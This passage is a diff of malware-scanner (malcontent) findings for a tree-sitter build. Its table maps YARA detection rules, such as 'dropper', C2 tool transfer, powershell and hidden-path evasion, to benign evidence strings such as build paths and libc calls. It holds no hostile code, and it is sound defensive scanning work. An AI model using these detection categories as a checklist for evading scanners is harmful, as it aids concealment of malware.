--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [exec/shell/tmp_semicolon](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/tmp_semicolon.yara#semicolon_short_tmp) | unusual one-liners involving /tmp | [--;/tmp/rust-20241004-6494-uljaw4/rustc-1](https://github.com/search?q=--%3B%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1&type=code) | -| MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [Dropper](https://github.com/search?q=Dropper&type=code) | -| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/clap/issues/home/linuxbrew/.cache](https://github.com/search?q=%2Fclap%2Fissues%2Fhome%2Flinuxbrew%2F.cache&type=code)
[/debug/.J](https://github.com/search?q=%2Fdebug%2F.J&type=code)
[/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | -| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | -| MEDIUM | [exec/shell/power](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/powershell.yara#powershell) | powershell | [powershell](https://github.com/search?q=powershell&type=code) | -| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.cache/Homebrew/cargo_cache/registry/src/index.crates.](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.cache%2FHomebrew%2Fcargo_cache%2Fregistry%2Fsrc%2Findex.crates.&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/tree-sitter/0.24.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Ftree-sitter%2F0.24.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code) | -| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/col](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fcol&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/raw](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fraw&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/str](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fstr&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/syn](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fsyn&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/vec](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fvec&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/cell](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fcell&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/esca](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fesca&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/io/b](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fio%2Fb&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/num/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fnum%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/ops/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fops%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/slic](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fslic&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/str/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fstr%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/time](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Ftime&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/mo](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fmo&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/st](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fst&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/os/fd](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fos%2Ffd&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sync/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsync%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/p](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fp&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/threa](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fthrea&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/addr2line-0.22](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Faddr2line-0.22&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/gimli-0.29.0/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fgimli-0.29.0%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/hashbrown-0.14](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fhashbrown-0.14&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/miniz_oxide-0.](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fminiz_oxide-0.&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/rustc-demangle](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Frustc-demangle&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/config/s](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fconfig%2Fs&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/generate](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fgenerate&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/src/high](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fsrc%2Fhigh&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/highlight/sr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fhighlight%2Fsr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/binding_](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fbinding_&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/././](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2F.%2F&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./ge](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fge&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./la](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fla&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./pa](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fpa&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./qu](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fqu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./st](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fst&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./su](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fsu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./tr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Ftr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/tags/src/lib](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Ftags%2Fsrc%2Flib&type=code) | -| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | -| LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) | -| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | -| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [exec/shell/SHELL](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/SHELL.yara#SHELL) | [path to active shell](https://man.openbsd.org/login.1#ENVIRONMENT) | [SHELL](https://github.com/search?q=SHELL&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-list.yara#GoReadDir) | Uses Go functions to list a directory | [.ReadDir](https://github.com/search?q=.ReadDir&type=code) | -| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | -| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | -| LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | -| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | -| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | -| LOW | [net/http/2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http2.yara#http2) | Uses the HTTP/2 protocol | [HTTP/2](https://github.com/search?q=HTTP%2F2&type=code) | -| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) | -| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | -| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | -| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop](https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j)
[https://code.jquery.com/jquery-3.3.1.min.js](https://code.jquery.com/jquery-3.3.1.min.js)
[https://docs.rs/getrandom](https://docs.rs/getrandom)
[https://docs.rs/tree-sitter-language/](https://docs.rs/tree-sitter-language/)
[https://docs.rs/tree-sitter/](https://docs.rs/tree-sitter/)
[https://github.com/ChimeHQ/SwiftTreeSitter](https://github.com/ChimeHQ/SwiftTreeSitter)
[https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car](https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car)
[https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c](https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c)
[https://github.com/tree-sitter/tree-sitter-Failed](https://github.com/tree-sitter/tree-sitter-Failed)
[https://gitlab.com/https](https://gitlab.com/https)
[https://parser.cparser.h](https://parser.cparser.h)
[https://tree-sitter.github.io/tree-sitter.jshttps](https://tree-sitter.github.io/tree-sitter.jshttps)
[https://tree-sitter.github.io/tree-sitter.wasmhttps](https://tree-sitter.github.io/tree-sitter.wasmhttps)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png)
[https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT](https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT)
[https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j](https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j)
[https://tree-sitter.github.io/tree-sitter/creating-parsers](https://tree-sitter.github.io/tree-sitter/creating-parsers)
[https://tree-sitter.github.io/tree-sitter/playground](https://tree-sitter.github.io/tree-sitter/playground)
[https://tree-sitter.github.io/tree-sitter/syntax-highlighting](https://tree-sitter.github.io/tree-sitter/syntax-highlighting)
[https://tree-sitter.github.io/tree-sitter/using-parsers](https://tree-sitter.github.io/tree-sitter/using-parsers) | -| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [stdout.write(output)](https://github.com/search?q=stdout.write%28output%29&type=code) | -| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd -u env -i](https://github.com/search?q=cd+-u++env+-i&type=code) | -| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | -| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | -| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [Uses glibc thread local storage](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | -| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|---------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| HIGH | [exec/shell/tmp_semicolon](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/tmp_semicolon.yara#semicolon_short_tmp) | unusual one-liners involving /tmp | [--;/tmp/rust-20241004-6494-uljaw4/rustc-1](https://github.com/search?q=--%3B%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1&type=code) | +| MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [Dropper](https://github.com/search?q=Dropper&type=code) | +| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/clap/issues/home/linuxbrew/.cache](https://github.com/search?q=%2Fclap%2Fissues%2Fhome%2Flinuxbrew%2F.cache&type=code)
[/debug/.J](https://github.com/search?q=%2Fdebug%2F.J&type=code)
[/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | +| MEDIUM | [exec/shell/power](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/powershell.yara#powershell) | powershell | [powershell](https://github.com/search?q=powershell&type=code) | +| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.cache/Homebrew/cargo_cache/registry/src/index.crates.](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.cache%2FHomebrew%2Fcargo_cache%2Fregistry%2Fsrc%2Findex.crates.&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/tree-sitter/0.24.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Ftree-sitter%2F0.24.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code) | +| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/col](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fcol&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/raw](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fraw&type=code)
